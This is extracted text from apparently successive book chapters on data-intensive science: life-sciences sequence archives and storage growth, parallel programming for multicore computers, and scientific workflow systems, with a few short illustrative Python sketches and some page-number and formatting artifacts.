[1] D. S. Greenberg, Science, Money, and Politics: Political Triumph and Ethical Erosion. Chicago: University of Chicago Press, 2001.
[2] National Research Council, Assessing the Impacts of Changes in the Information Technology R&D Ecosystem: Retaining Leadership in an Increasingly Global Environment. Washington, D.C.: National Academies Press, 2009.
[3] D. Sarewitz and R. A. Pielke, Jr., The neglected heart of science policy: reconciling supply of and demand for science, Environ. Sci. Policy, vol. 10, pp. 5-16, 2007, doi: 10.1016/j.envsci.2006.10.001.
[4] L. Dilling, Towards science in support of decision making: characterizing the supply of carbon cycle science, Environ. Sci. Policy, vol. 10, pp. 48-61, 2007, doi: 10.1016/j.envsci.2006.10.008.
[5] Intergovernmental Panel on Climate Change, Climate Change 2007: The Physical Science Basis. New York: Cambridge University Press, 2007.
[6] C. Anderson, The End of Theory, Wired, vol. 16, no. 7, pp. 108-109, 2008.

Beyond the Tsunami: Developing the Infrastructure to Deal with Life Sciences Data

Scientific revolutions are difficult to quantify, but the rate of data generation in science has increased so profoundly that we can simply examine a single area of the life sciences to appreciate the magnitude of this effect across all of them. Figure 1 tracks the dramatic increase in the number of individual bases submitted to the European Molecular Biology Laboratory Nucleotide Sequence Database (EMBL-Bank) by the global experimental community. This submission rate is currently growing at 200% per annum. Custodianship of the data is held by the International Nucleotide Sequence Database Collaboration (INSDC), which consists of the DNA Data Bank of Japan (DDBJ), GenBank in the U.S., and EMBL-Bank in the UK. These three repositories exchange new data on a daily basis.
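As a rough, back-of-the-envelope illustration of what the 200%-per-annum growth figure quoted above implies, the short Python sketch below projects the total number of bases forward a few years; the starting value and the reading of "200% growth" as the total tripling each year are assumptions made for illustration, not figures taken from the archive itself.

```python
def project_bases(current_bases, annual_growth_rate, years):
    # Compound growth: a 200% annual increase (rate = 2.0) means the
    # total is multiplied by 3 every year under this reading.
    return current_bases * (1 + annual_growth_rate) ** years

start = 2.5e11  # illustrative starting point: a few hundred billion bases
for year in range(5):
    print(year, f"{project_bases(start, 2.0, year):.2e} bases")
```

Even at this coarse level, the projection makes clear why storage and backup strategy, rather than raw sequencing capacity, quickly becomes the limiting concern.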
As of May 2009, the totals stood at approximately 250 billion bases in 160 million entries. A recent submission to EMBL-Bank, accession number FJ982430, illustrates the speed of data generation and the effectiveness of the global bioinformatics infrastructure in responding to a health crisis. It includes the complete H1 subunit sequence of 1,699 bases from the first case of novel H1N1 influenza virus in Denmark. This was submitted on May 4, 2009, within days of the infected person being diagnosed. Many more virus subunit sequences have been submitted from the U.S., Italy, Mexico, Canada, Denmark, and Israel since the beginning of the 2009 global H1N1 pandemic.

Figure 1. Growth in the number of bases deposited in EMBL-Bank from 1982 to the beginning of 2009.

EMBL-Bank is hosted at the European Bioinformatics Institute (EBI), an academic organization based in Cambridge, UK, that forms part of the European Molecular Biology Laboratory (EMBL). The EBI is a center for both research and services in bioinformatics. It hosts biological data, including nucleic acid and protein sequences and macromolecular structures. The neighboring Wellcome Trust Sanger Institute generates about 8 percent of the world's sequencing data output. Both of these institutions on the Wellcome Trust Genome campus include scientists who generate data and administer the databases into which it flows, biocurators who provide annotations, bioinformaticians who develop analytical tools, and research groups that seek biological insights and consolidate them through further experimentation. Consequently, it is a community in which issues surrounding computing infrastructure, data storage, and mining are confronted on a daily basis, and in which both local and global collaborative solutions are continually explored.

The collective name for the nucleotide sequencing information service is the European Nucleotide Archive [1]. It includes EMBL-Bank and three other repositories that were set up for new types of data generation: the Trace Archive for trace data from first-generation capillary instruments, the Short Read Archive for data from next-generation sequencing instruments, and a pilot Trace Assembly Archive that stores alignments of sequencing reads with links to finished genomic sequences in EMBL-Bank. Data from all archives are exchanged regularly with the National Center for Biotechnology Information in the U.S. Figure 2 compares the sizes of these archives.

The introduction in 2005 of so-called next-generation sequencing instruments that are capable of producing millions of DNA sequence reads in a single run has not only led to a huge increase in genetic information but has also placed bioinformatics, and life sciences research in general, at the leading edge of infrastructure development for the storage, movement, analysis, interpretation, and visualization of petabyte-scale datasets [2]. The Short Read Archive, the European repository for accepting data from these machines, received 30 terabytes (TB) of data in the first six months of operation, equivalent to almost 30% of the entire EMBL-Bank content accumulated over the 28 years since data collection began.

Figure 2. The size in data volume and nucleotide numbers of EMBL-Bank, the Trace Archive, and the Short Read Archive as of May 2009.
The uptake of new instruments and technical developments will not only increase submissions to this archive manyfold within a few years, but it will also herald the arrival of next-next-generation DNA sequencing systems [3]. To meet this demand, the EBI has increased storage from 2,500 TB (2.5 PB) in 2008 to 5,000 TB (5 PB) in 2009, an approximate annual doubling. Even if the capacity keeps pace, bottlenecks might emerge as I/O limitations move to other points in the infrastructure. For example, at this scale, traditional backup becomes impractically slow. Indeed, a hypothetical total data loss at the EBI is estimated to require months of restore time. This means that streamed replication of the original data is becoming a more efficient option, with copies being stored at multiple locations. Another bottleneck example is that technical advances in data transfer speeds now exceed the capacity to write out to disks (about 70 megabits/sec), with no imminent expectation of major performance increases. The problem can be ameliorated by writing to multiple disks, but at a considerable increase in cost.

This inexorable load increase necessitates continual assessment of the balance between submitting derived data to the repositories and storing raw instrument output locally. Scientists at all stages of the process (experimentalists, instrument operators, datacenter administrators, bioinformaticians, and biologists who analyze the results) will need to be involved in decisions about storage strategies. For example, in laboratories running high-throughput sequencing instruments, the cost of storing raw data for a particular experiment is already approaching that of repeating the experiment. Researchers may balk at the idea of deleting raw data after processing, but this is a pragmatic option that has to be considered. Less controversial solutions involve a triage of data reduction options between raw output, base calls, sequence reads, assemblies, and genome consensus sequences. An example of such a solution is FASTQ, a text-based format for storing both a nucleotide sequence and its corresponding quality scores, with each base and each quality score encoded as a single ASCII character. Developed by the Sanger Institute, it has recently become a standard for storing the output of next-generation sequencing instruments. It can produce a 200-fold reduction in data volume; that is, 99.5% of the raw data can be discarded. Even more compressed sequence data representations are in development. (A minimal sketch of this record layout is given below.)

Genomes: Rolling Off the Production Line

The production of complete genomes is rapidly advancing our understanding of biology and evolution. The impressive progress is illustrated in Figure 3, which depicts the increase of genome sequencing projects in the Genomes OnLine Database (GOLD). While the figure was generated based on all global sequencing projects, many of these genomes are available for analysis on the Ensembl Web site hosted jointly by the EBI and the Sanger Institute. The graph shows that, by 2010, well over 5,000 genome projects will have been initiated and more than 1,000 will have produced complete assemblies. A recent significant example is the bovine genome [4], which followed the chicken and will soon be joined by all other major agricultural species.
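Returning briefly to the FASTQ format mentioned above, the following minimal Python sketch shows the four-line record layout and how per-base quality scores are recovered from single ASCII characters. It assumes the Sanger-style Phred+33 encoding (other encodings with different offsets were also in circulation at the time), and the read shown is invented purely for illustration.

```python
import io

def read_fastq(handle):
    """Yield (identifier, sequence, phred_qualities) from a FASTQ stream."""
    while True:
        header = handle.readline().strip()
        if not header:
            return
        seq = handle.readline().strip()
        handle.readline()                    # the '+' separator line
        qual = handle.readline().strip()
        # Sanger encoding: Phred quality = ASCII code minus 33.
        yield header[1:], seq, [ord(c) - 33 for c in qual]

record = "@read_1\nGATTACA\n+\nIIIIHH#\n"
for name, seq, quals in read_fastq(io.StringIO(record)):
    print(name, seq, quals)   # read_1 GATTACA [40, 40, 40, 40, 39, 39, 2]
```

Because each base and each quality value occupy a single byte, a FASTQ record is a compact, human-readable summary of what the instrument measured, which is precisely why it became a favored data-reduction target.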
These genomes will not only help advance our understanding of mammalian evolution and domestication, but they will also accelerate genetic improvements for farming and food production.

Figure 3. The increase in both initiated and completed genome projects since 1997 in the Genomes OnLine Database (GOLD). Courtesy of GOLD.

Resequencing the Human Genome: Another Data Scale-up

Recent genome-wide studies of human genetic variation have advanced our understanding of common human diseases. This has motivated the formation of an international consortium to develop a comprehensive catalogue of sequence variants in multiple human populations. Over the next three years, the Sanger Institute, BGI Shenzhen in China, and the National Human Genome Research Institute's Large-Scale Genome Sequencing Program in the U.S. are planning to sequence a minimum of 1,000 human genomes. In 2008, the pilot phase of the project generated approximately 1 terabase (trillion bases) of sequence data per month; the number is expected to double in 2009. The total generated will be about 20 terabases. The requirement of about 30 bytes of disk storage per base of sequence can be extrapolated to about 500 TB of data for the entire project. By comparison, the original human genome project took about 10 years to generate about 40 gigabases (billion bases) of DNA sequence. Over the next two years, up to 10 billion bases will be sequenced per day, equating to more than two human genomes (at 2.85 billion bases per human) every 24 hours. The completed dataset of 6 trillion DNA bases will be 60 times more sequence data than that shown earlier in Figure 1.

Even before the arrival of the draft human genome in 2001, biological databases were moving from the periphery to the center of modern life sciences research, leading to the problem that the capacity to mine data has fallen behind our ability to generate it. As a result, there is a pressing need for new methods to fully exploit not only genomic data but also other high-throughput result sets deposited in databases. These result sets are also becoming more hypothesis-neutral compared with traditional small-scale, focused experiments.

Usage statistics for EBI services, shown in Figure 4, indicate that the biological community, supported by the bioinformatics specialists they collaborate with, are accessing these resources in increasing numbers. The Web pages associated with the 63 databases hosted at the EBI now receive over 3.5 million hits per day, representing more than half a million independent users per month. While this does not match the increase in rates of data accumulation, evidence for a strong increase in data mining is provided by the Web services programmatic access figures, which are approaching 1 million jobs per month.

Figure 4. Web accesses (Common Gateway Interface [CGI]) and Web services usage (application programming interface [API]) recorded on EBI servers from 2005 to 2009.

To further facilitate data use, the EBI is developing, using open standards, the EB-eye search system to provide a single entry point.
By indexing in various formats (e.g., flat files, XML dumps, and OBO format), the system provides fast access and allows the user to search globally across all EBI databases or individually in selected resources. EBI resources are effectively responding to increasing demand from both the generators and users of data, but increases in scale for the life sciences across the whole of Europe require long-term planning. This is the mission of the ELIXIR project, which aims to ensure a reliable distributed infrastructure to maximize access to biological information that is currently distributed in more than 500 databases throughout Europe. The project addresses not only data management problems but also sustainable funding to maintain the data collections and global collaborations. It is also expected to put in place processes for developing collections for new data types, supporting interoperability of bioinformatics tools, and developing bioinformatics standards and ontologies.

The development of ELIXIR parallels the transition to a new phase in which high-performance, data-intensive computing is becoming essential to progress in the life sciences [5]. By definition, the consequences for research cannot be predicted with certainty. However, some pointers can be given. By mining not only the increasingly comprehensive datasets generated by genome sequencing mentioned above but also transcript data, proteomics information, and structural genomics output, biologists will obtain new insights into the processes of life and their evolution. This will in turn facilitate new predictive power for synthetic biology and systems biology. Beyond its profound impact on the future of academic research, this data-driven progress will also translate to the more applied areas of science, such as pharmaceutical research, biotechnology, medicine, public health, agriculture, and environmental science, to improve the quality of life for everyone.

References

[1] G. Cochrane et al., Petabyte-scale innovations at the European Nucleotide Archive, Nucleic Acids Res., vol. 37, pp. D19-25, Jan. 2009, doi: 10.1093/nar/gkn765.
[2] E. R. Mardis, The impact of next-generation sequencing technology on genetics, Trends Genet., vol. 24, no. 3, pp. 133-141, Mar. 2008.
[3] N. Blow, DNA sequencing: generation next-next, Nat. Methods, vol. 5, pp. 267-274, 2008, doi: 10.1038/nmeth0308-267.
[4] Bovine Genome Sequencing and Analysis Consortium, The genome sequence of taurine cattle: a window to ruminant biology and evolution, Science, vol. 324, no. 5926, pp. 522-528, Apr. 24, 2009.
[5] G. Bell, T. Hey, and A. Szalay, Beyond the Data Deluge, Science, vol. 323, no. 5919, pp. 1297-1298, Mar. 6, 2009, doi: 10.1126/science.1170411.

Computation and scientific research have grown up together. Scientists' and researchers' insatiable need to perform more and larger computations has long exceeded the capabilities of conventional computers. The only approach that has met this need is parallelism, computing more than one operation simultaneously. At one level, parallelism is simple and easy to put into practice. Building a parallel computer by replicating key operating components such as the arithmetic units or even complete processors is not difficult. But it is far more challenging to build a well-balanced machine that is not stymied by internal bottlenecks.
In the end, the principal problem has been software, not hardware. Parallel programs are far more difficult to design, write, debug, and tune than sequential software, which itself is still not a mature, reproducible artifact.

The Evolution of Parallel Computing

The evolution of successive generations of parallel computing hardware has also forced a constant rethinking of parallel algorithms and software. Early machines such as the IBM Stretch, the Cray I, and the Control Data Cyber series all exposed parallelism as vector operations. The Cray II, Encore, Alliant, and many generations of IBM machines were built with multiple processors that shared memory. Because it proved so difficult to increase the number of processors while sharing a single memory, designs evolved further into systems in which no memory was shared and processors shared information by passing messages. Beowulf clusters, consisting of racks of standard PCs connected by Ethernet, emerged as an economical approach to supercomputing. Networks improved in latency and bandwidth, and this form of distributed computing now dominates supercomputers. Other systems, such as the Cray multi-threaded platforms, demonstrated that there were different approaches to addressing shared-memory parallelism. While the scientific computing community has struggled with programming each generation of these exotic machines, the mainstream computing world has been totally satisfied with sequential programming on machines where any parallelism is hidden from the programmer deep in the hardware.

In the past few years, parallel computers have entered mainstream computing with the advent of multicore computers. Previously, most computers were sequential and performed a single operation per time step. Moore's Law drove the improvements in semiconductor technology that doubled the transistors on a chip every two years, which increased the clock speed of computers at a similar rate and also allowed for more sophisticated computer implementations. As a result, computer performance grew at roughly 40% per year from the 1970s, a rate that satisfied most software developers and computer users. This steady improvement ended because increased clock speeds require more power, and at approximately 3 GHz, chips reached the limit of economical cooling. Computer chip manufacturers, such as Intel, AMD, IBM, and Sun, shifted to multicore processors that used each Moore's Law generation of transistors to double the number of independent processors on a chip. Each processor ran no faster than its predecessor, and sometimes even slightly slower, but in aggregate, a multicore processor could perform twice the amount of computation as its predecessor.

Parallel Programming Challenges

This new computer generation rests on the same problematic foundation of software that the scientific community struggled with in its long experience with parallel computers. Most existing general-purpose software is written for sequential computers and will not run any faster on a multicore computer. Exploiting the potential of these machines requires new, parallel software that can break a task into multiple pieces, solve them more or less independently, and assemble the results into a single answer (the sketch below illustrates this pattern in its simplest form). Finding better ways to produce parallel software is currently the most pressing problem facing the software development community and is the subject of considerable research and development.
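As a concrete, if deliberately trivial, illustration of the break-apart, solve, and assemble pattern just described, the following Python sketch farms a summation out to several worker processes. The chunking scheme, worker count, and workload are arbitrary choices made for illustration, not a recipe drawn from this chapter.

```python
from multiprocessing import Pool

def partial_sum(chunk):
    # Each worker solves its piece more or less independently.
    return sum(x * x for x in chunk)

if __name__ == "__main__":
    data = list(range(1_000_000))
    n_workers = 4
    # Break the task into multiple pieces, roughly one per core.
    chunks = [data[i::n_workers] for i in range(n_workers)]
    with Pool(n_workers) as pool:
        partials = pool.map(partial_sum, chunks)
    # Assemble the partial results into a single answer.
    print(sum(partials))
```

Even this toy example hides nontrivial machinery (process startup, data movement, result collection), which is exactly the kind of low-level detail the rest of the chapter argues should be lifted to a higher level of abstraction.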
The scientific and engineering communities can both benefit from these urgent efforts and can help inform them. Many parallel programming techniques originated in the scientific community, whose experience has influenced the search for new approaches to programming multicore computers. Future improvements in our ability to program multicore computers will benefit all software developers as the distinction between the leading-edge scientific community and general-purpose computing is erased by the inevitability of parallel computing as the fundamental programming paradigm.

One key problem in parallel programming today is that most of it is conducted at a very low level of abstraction. Programmers must break their code into components that run on specific processors and communicate by writing into shared memory locations or exchanging messages. In many ways, this state of affairs is similar to the early days of computing, when programs were written in assembly languages for a specific computer and had to be rewritten to run on a different machine. In both situations, the problem was not just the lack of reusability of programs, but also that assembly language development was less productive and more error prone than writing programs in higher-level languages.

Addressing the Challenges

Several lines of research are attempting to raise the level at which parallel programs can be written. The oldest and best-established idea is data parallel programming. In this programming paradigm, an operation or sequence of operations is applied simultaneously to all items in a collection of data. The granularity of the operation can range from adding two numbers in a data parallel addition of two matrices to complex data mining calculations in a map-reduce style computation [1]. The appeal of data parallel computation is that parallelism is mostly hidden from the programmer. Each computation proceeds in isolation from the concurrent computations on other data, and the code specifying the computation is sequential. The developer need not worry about the details of moving data and running computations because they are the responsibility of the runtime system. GPUs (graphics processing units) provide hardware support for this style of programming, and they have recently been extended into GPGPUs (general-purpose GPUs) that perform very high-performance numeric computations.

Unfortunately, data parallelism is not a programming model that works for all types of problems. Some computations require more communication and coordination. For example, protein folding calculates the forces on all atoms in parallel, but local interactions are computed in a manner different from remote interactions. Other examples of computations that are hard to write as data parallel programs include various forms of adaptive mesh refinement that are used in many modern physics simulations in which local structures, such as clumps of matter or cracks in a material structure, need finer spatial resolution than the rest of the system.

A new idea that has recently attracted considerable research attention is transactional memory (TM), a mechanism for coordinating the sharing of data in a multicore computer. Data sharing is a rich source of programming errors because the developer needs to ensure that a processor that changes the value of data has exclusive access to it.
If another processor also tries to access the data, one of the two updates can be lost, and if a processor reads the data too early, it might see an inconsistent value. The most common mechanism for preventing this type of error is a lock, which a program uses to prevent more than one processor from accessing a memory location simultaneously. Locks, unfortunately, are low-level mechanisms that are easily and frequently misused in ways that both allow concurrent access and cause deadlocks that freeze program execution. TM is a higher-level abstraction that allows the developer to identify a group of program statements that should execute atomically, that is, as if no other part of the program is executing at the same time. So instead of having to acquire locks for all the data that the statements might access, the developer shifts the burden to the runtime system and hardware. TM is a promising idea, but many engineering challenges still stand in the way of its widespread use. Currently, TM is expensive to implement without support in the processors, and its usability and utility in large, real-world codes are as yet undemonstrated. If these issues can be resolved, TM promises to make many aspects of multicore programming far easier and less error prone.

Another new idea is the use of functional programming languages. These languages embody a style of programming that mostly prohibits updates to program state. In other words, in these languages a variable can be given an initial value, but that value cannot be changed. Instead, a new variable is created with the new value. This style of programming is well suited to parallel programming because it eliminates the updates that require synchronization between two processors. Parallel, functional programs generally use mutable state only for communication among parallel processors, and they require locks or TM only for this small, distinct part of their data.

Until recently, only the scientific and engineering communities have struggled with the difficulty of using parallel computers for anything other than the most embarrassingly parallel tasks. The advent of multicore processors has changed this situation and has turned parallel programming into a major challenge for all software developers. The new ideas and programming tools developed for mainstream programs will likely also benefit the technical community and provide it with new means to take better advantage of the continually increasing power of multicore processors.

References

[1] D. Gannon and D. Reed, Parallelism and the Cloud, in this volume.
Hypotheses are not only tested through directed data collection and analysis but also generated by combining and mining the pool of data already available [1-3]. The scientific data landscape we draw upon is expanding rapidly in both scale and diversity. Taking the life sciences as an example, high-throughput gene sequencing platforms are capable of generating terabytes of data in a single experiment, and data volumes are set to increase further with industrial-scale automation. From 2001 to 2009, the number of databases reported in Nucleic Acids Research jumped from 218 to 1,170 [4]. Not only are the datasets growing in size and number, but they are only partly coordinated and often incompatible [5], which means that discovery and integration tasks are significant challenges. At the same time, we are drawing on a broader array of data sources: modern biology draws insights from combining different types of omic data (proteomic, metabolomic, transcriptomic, genomic) as well as data from other disciplines such as chemistry, clinical medicine, and public health, while systems biology links multi-scale data with multi-scale mathematical models. These data encompass all types: from structured database records to published articles, raw numeric data, images, and descriptive interpretations that use controlled vocabularies.

Data generation on this scale must be matched by scalable processing methods. The preparation, management, and analysis of data are bottlenecks and also beyond the skill of many scientists. Workflows [6] provide (1) a systematic and automated means of conducting analyses across diverse datasets and applications; (2) a way of capturing this process so that results can be reproduced and the method can be reviewed, validated, repeated, and adapted; (3) a visual scripting interface so that computational scientists can create these pipelines without low-level programming concerns; and (4) an integration and access platform for the growing pool of independent resource providers so that computational scientists need not specialize in each one. The workflow is thus becoming a paradigm for enabling science on a large scale by managing data preparation and analysis pipelines, as well as the preferred vehicle for computational knowledge extraction.

Workflows Defined

A workflow is a precise description of a scientific procedure, a multi-step process to coordinate multiple tasks, acting like a sophisticated script [7]. Each task represents the execution of a computational process, such as running a program, submitting a query to a database, submitting a job to a compute cloud or grid, or invoking a service over the Web to use a remote resource. Data output from one task is consumed by subsequent tasks according to a predefined graph topology that orchestrates the flow of data. Figure 1 presents an example workflow, encoded in the Taverna Workflow Workbench [8], which searches for genes by linking four publicly available data resources distributed in the U.S., Europe, and Japan: BioMart, Entrez, UniProt, and KEGG. Workflow systems generally have three components: an execution platform, a visual design suite, and a development kit.
The platform executes the workflow on behalf of applications and handles common crosscutting concerns, including (1) invocation of the service applications and handling the heterogeneity of data types and interfaces on multiple computing platforms; (2) monitoring and recovery from failures; (3) optimization of memory, storage, and execution, including concurrency and parallelization; (4) data handling: mapping, referencing, movement, streaming, and staging; (5) logging of processes and data provenance tracking; and (6) security and monitoring of access policies. Workflow systems are required to support long-running processes in volatile environments and thus must be robust and capable of fault tolerance and recovery. They also need to evolve continually to harness the growing capabilities of underlying computational and storage resources, delivering greater capacity for analysis.

Figure 1. A Taverna workflow that connects several internationally distributed datasets to identify candidate genes that could be implicated in resistance to African trypanosomiasis [11].

The design suite provides a visual scripting application for authoring and sharing workflows and preparing the components that are to be incorporated as executable steps. The aim is to shield the author from the complexities of the underlying applications and enable the author to design and understand workflows without recourse to commissioning specialist and specific applications or hiring software engineers. This empowers scientists to build their own pipelines when they need them and how they want them. Finally, the development kit enables developers to extend the capabilities of the system and enables workflows to be embedded into applications, Web portals, or databases. This embedding is transformational: it has the potential to incorporate sophisticated knowledge seamlessly and invisibly into the tools that scientists use routinely.

Each workflow system has its own language, design suite, and software components, and the systems vary in their execution models and the kinds of components they coordinate [9]. Sedna is one of the few to use the industry-standard Business Process Execution Language (BPEL) for scientific workflows [10]. (A toy sketch of the underlying dataflow idea, independent of any particular system, follows.)
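The sketch below is a deliberately minimal Python rendering of the dataflow idea defined earlier: a graph of tasks in which each task consumes the outputs of its upstream dependencies. The task names and functions are invented placeholders, and a real system such as those named in this chapter adds the monitoring, provenance, and fault-tolerance machinery listed above.

```python
# Stand-in task bodies; each receives a dict of its upstream outputs.
def fetch(inputs):     return list(range(10))                          # e.g., a database query
def clean(inputs):     return [x for x in inputs["fetch"] if x % 2 == 0]
def annotate(inputs):  return [(x, x * x) for x in inputs["clean"]]
def report(inputs):    return {"rows": len(inputs["annotate"]), "data": inputs["annotate"]}

# The graph topology: task name -> (function, upstream task names).
workflow = {
    "fetch":    (fetch,    []),
    "clean":    (clean,    ["fetch"]),
    "annotate": (annotate, ["clean"]),
    "report":   (report,   ["annotate"]),
}

def run(workflow, target, cache=None):
    """Execute a task after recursively executing the tasks it depends on."""
    cache = {} if cache is None else cache
    if target not in cache:
        func, deps = workflow[target]
        inputs = {d: run(workflow, d, cache) for d in deps}
        cache[target] = func(inputs)          # each output is computed exactly once
    return cache[target]

print(run(workflow, "report"))
```

Independent branches of such a graph could equally well be dispatched concurrently, which is where the optimization and parallelization concerns listed above come into play.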
General-purpose open source workflow systems include Taverna, Kepler, Pegasus, and Triana. Other systems, such as the LONI Pipeline for neuroimaging and the commercial Pipeline Pilot for drug discovery, are more geared toward specific applications and are optimized to support specific component libraries. These focus on interoperating applications; other workflow systems target the provisioning of compute cycles or submission of jobs to grids. For example, Pegasus and DAGMan have been used for a series of large-scale eScience experiments such as prediction models in earthquake forecasting using sensor data in the Southern California Earthquake Center (SCEC) CyberShake project.

Workflow Usage

Workflows liberate scientists from the drudgery of routine data processing so they can concentrate on scientific discovery. They shoulder the burden of routine tasks, they represent the computational protocols needed to undertake data-centric science, and they open up the use of processes and data resources to a much wider group of scientists and scientific application developers.

Workflows are ideal for systematically, accurately, and repeatedly running routine procedures: managing data capture from sensors or instruments; cleaning, normalizing, and validating data; securely and efficiently moving and archiving data; comparing data across repeated runs; and regularly updating data warehouses. For example, the Pan-STARRS astronomical survey uses Microsoft Trident Scientific Workflow Workbench workflows to load and validate telescope detections running at about 30 TB per year. Workflows have also proved useful for maintaining and updating data collections and warehouses by reacting to changes in the underlying datasets. For example, the Nijmegen Medical Centre rebuilt the tGRAP G-protein coupled receptors mutant database using a suite of text-mining Taverna workflows.

At a higher level, a workflow is an explicit, precise, and modular expression of an in silico or dry lab experimental protocol. Workflows are ideal for gathering and aggregating data from distributed datasets and data-emitting algorithms, a core activity in dataset annotation; data curation; and multi-evidential, comparative science. In Figure 1, disparate datasets are searched to find and aggregate data related to metabolic pathways implicated in resistance to African trypanosomiasis; interlinked datasets are chained together by the dataflow. In this instance, the automated and systematic processing by the workflow overcame the inadequacies of manual data triage (which leads to prematurely excluding data from analysis to cope with the quantity) and delivered new results [11].

Beyond data assembly, workflows codify data mining and knowledge discovery pipelines and parameter sweeps across predictive algorithms. For example, LEAD workflows are driven by external events generated by data mining agents that monitor collections of instruments for significant patterns to trigger a storm prediction analysis; the Jet Propulsion Laboratory uses Taverna workflows for exploring a large space of multiple-parameter configurations of space instruments.

Finally, workflow systems liberate the implicit workflow embedded in an application into an explicit and reusable specification over a common software machinery and shared infrastructure. Expert informaticians use workflow systems directly as a means to develop workflows for handling infrastructure;
Expert informaticians use workflow systems directly as means to develop workflows for handling infrastructure; expert 9 141 scientific informaticians use them to design and explore new investigative procedures; a larger group of scientists uses precooked workflows with restricted configuration constraints launched from within applications or hidden behind Web portals. Workflow-enabled Data-centric Science Workflows offer techniques to support the new paradigm of data-centric science. They can be replayed and repeated. Results and secondary data can be computed as needed using the latest sources, providing virtual data (or on-demand) warehouses by effectively providing distributed query processing. Smart reruns of workflows automatically deliver new outcomes when fresh primary data and new results become availableand also when new methods become available. The workflows themselves, as first-class citizens in data-centric science, can be generated and transformed dynamically to meet the requirements at hand. In a landscape of data in considerable flux, workflows provide robustness, accountability, and full auditing. By combining workflows and their execution records with published results, we can promote systematic, unbiased, transparent, and comparable research in which outcomes carry the provenance of their derivation. This can potentially accelerate scientific discovery. To accelerate experimental design, workflows can be reconfigured and repurposed as new components or templates. Creating workflows requires expertise that is hard won and often outside the skill set of the researcher. Workflows are often complex and challenging to build because they are essentially forms of programming that require some understanding of the datasets and the tools they manipulate [12]. Hence there is significant benefit in establishing shared collections of workflows that contain standard processing pipelines for immediate reuse or for repurposing in whole or in part. These aggregations of expertise and resources can help propagate techniques and best practices. Specialists can create the application steps, experts can design the workflows and set parameters, and the inexperienced can benefit by using sophisticated protocols. The myExperiment12 social Web site has demonstrated that by adopting contentsharing tools for repositories of workflows, we can enable social networking around workflows and provide community support for social tagging, comments, ratings and recommendations, and mixing of new workflows with those previously 12 142 SCIENTIFIC INFRASTRUCTURE deposited [13]. This is made possible by the scale of participation in data-centric science, which can be brought to bear on challenging problems. For example, the environment of workflow execution is in such a state of flux that workflows appear to decay over time, but workflows can be kept current by a combination of expert and community curation. Workflows enable data-centric science to be a collaborative endeavor on multiple levels. They enable scientists to collaborate over shared data and shared services, and they grant non-developers access to sophisticated code and applications without the need to install and operate them. Consequently, scientists can use the best applications, not just the ones with which they are familiar. Multidisciplinary workflows promote even broader collaboration. 
In this sense, a workflow system is a framework for reusing a communitys tools and datasets that respects the original codes and overcomes diverse coding styles. Initiatives such as the BioCatalogue13 registry of life science Web services and the component registries deployed at SCEC enable components to be discovered. In addition to the benefits that come from explicit sharing, there is considerable value in the information that may be gathered just through monitoring the use of data sources, services, and methods. This enables automatic monitoring of resources and recommendation of common practice and optimization. Although the impact of workflow tools on data-centric research is potentially profoundscaling processing to match the scaling of datamany challenges exist over and above the engineering issues inherent in large-scale distributed software [14]. There are a confusing number of workflow platforms with various capabilities and purposes and little compliance with standards. Workflows are often difficult to author, using languages that are at an inappropriate level of abstraction and expecting too much knowledge of the underlying infrastructure. The reusability of a workflow is often confined to the project it was conceived inor even to its authorand it is inherently only as strong as its components. Although workflows encourage providers to supply clean, robust, and validated data services, component failure is common. If the services or infrastructure decays, so does the workflow. Unfortunately, debugging failing workflows is a crucial but neglected topic. Contemporary workflow platforms fall short of adequately supporting rapid deployment into the user applications that consume them, and legacy application codes need to be integrated and managed. 13 143 Conclusion Workflows affect data-centric research in four ways. First, they shift scientific practice. For example, in a data-driven hypothesis [1], data analysis yields results that are to be tested in the laboratory. Second, they have the potential to empower scientists to be the authors of their own sophisticated data processing pipelines without having to wait for software developers to produce the tools they need. Third, they offer systematic production of data that is comparable and verifiably attributable to its source. Finally, people speak of a data deluge [15], and datacentric science could be characterized as being about the primacy of data as opposed to the primacy of the academic paper or document [16], but it brings with it a method deluge: workflows illustrate primacy of method as another crucial paradigm in data-centric research. References [1] D. B. Kell and S. G. Oliver, Here is the evidence, now what is the hypothesis? The complementary roles of inductive and hypothesis-driven science in the post-genomic era, BioEssays, vol. 26, no. 1, pp. 99105, 2004, doi: 10.1002/bies.10385. [2] A. Halevy, P. Norvig, and F. Pereira, The Unreasonable Effectiveness of Data, IEEE Intell. Syst., vol. 24, no. 2, pp. 812. 2009, doi: 10.1109/MIS.2009.36. [3] C. Anderson, The End of Theory: The Data Deluge Makes the Scientific Method Obsolete, Wired, vol. 16, no. 7, June 23, 2008, pb_theory. [4] M. Y. Galperin and G. R. Cochrane, Nucleic Acids Research annual Database Issue and the NAR online Molecular Biology Database Collection in 2009, Nucl. Acids Res., vol. 37 (Database issue), pp. D1D4, doi: 10.1093/nar/gkn942. [5] C. Goble and R. Stevens, The State of the Nation in Data Integration in Bioinformatics, J. Biomed. Inform., vol. 
41, no. 5, pp. 687–693, 2008.
[6] I. J. Taylor, E. Deelman, D. B. Gannon, and M. Shields, Eds., Workflows for e-Science: Scientific Workflows for Grids. London: Springer, 2007.
[7] P. Romano, Automation of in-silico data analysis processes through workflow management systems, Brief. Bioinform., vol. 9, no. 1, pp. 57–68, Jan. 2008, doi: 10.1093/bib/bbm056.
[8] vol. 18, no. 10, pp. 1067–1100, 2006, doi: 10.1002/cpe.v18:10.
[9] E. Deelman, D. Gannon, M. Shields, and I. Taylor, Workflows and e-Science: An overview of workflow system features and capabilities, Future Gen. Comput. Syst., vol. 25, no. 5, pp. 528–540, May 2009, doi: 10.1016/j.future.2008.06.012.
[10] B. Wassermann, W. Emmerich, B. Butchart, N. Cameron, L. Chen, and J. Patel, Sedna: a BPEL-based environment for visual scientific workflow modelling, in I. J. Taylor, E. Deelman, D. B. Gannon, and M. Shields, Eds., Workflows for e-Science: Scientific Workflows for Grids. London: Springer, 2007, pp. 428–449, doi: 10.1.1.103.7892.
[11] P. Fisher, C. Hedeler, K. Wolstencroft, H. Hulme, H. Noyes, S. Kemp, R. Stevens, and A. Brass, A Systematic Strategy for Large-Scale Analysis of Genotype-Phenotype Correlations: Identification of candidate genes involved in African Trypanosomiasis, Nucleic Acids Res., vol. 35, no. 16, pp. 5625–5633, 2007, doi: 10.1093/nar/gkm623.
[12] A. Goderis, U. Sattler, P. Lord, and C. Goble, Seven Bottlenecks to Workflow Reuse and Repurposing, in The Semantic Web, ISWC 2005, pp. 323–337, doi: 10.1007/11574620_25.
